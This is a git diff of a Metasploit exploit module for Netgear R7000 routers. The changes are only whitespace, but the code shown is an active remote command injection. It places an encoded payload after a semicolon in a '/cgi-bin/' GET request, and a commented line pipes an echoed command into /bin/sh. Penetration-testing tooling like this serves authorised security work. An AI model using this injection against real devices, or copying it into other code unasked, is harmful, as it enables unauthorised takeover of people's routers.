diff --git a/modules/exploits/linux/http/netgear_r7000_cgibin_exec.rb b/modules/exploits/linux/http/netgear_r7000_cgibin_exec.rb index e9e4f3e55e..7d92a857de 100644 --- a/modules/exploits/linux/http/netgear_r7000_cgibin_exec.rb +++ b/modules/exploits/linux/http/netgear_r7000_cgibin_exec.rb @@ -39,7 +39,7 @@ class MetasploitModule < Msf::Exploit::Remote { 'Space' => 1024, 'DisableNops' => true, - 'BadChars' => "\x20" + 'BadChars' => "\x20" } )) @@ -80,20 +80,20 @@ class MetasploitModule < Msf::Exploit::Remote def exploit check - + pe = payload.encoded pe.to_s pe.gsub!('{','') - pe.gsub!('}','') - + pe.gsub!('}','') + #cmd = payload.encoded.unpack("C*").map{|c| "\\x%.2x" % c}.join #str = "echo$IFS-ne$IFS\"#{cmd}\"|/bin/sh&" print_status('Sending encoded command...') vprint_status("Encoded command: #{pe}") - send_request_cgi({ - 'uri' => "/cgi-bin/;#{pe}", - 'method' => 'GET' + send_request_cgi({ + 'uri' => "/cgi-bin/;#{pe}", + 'method' => 'GET' }) print_status('Giving the handler time to run...')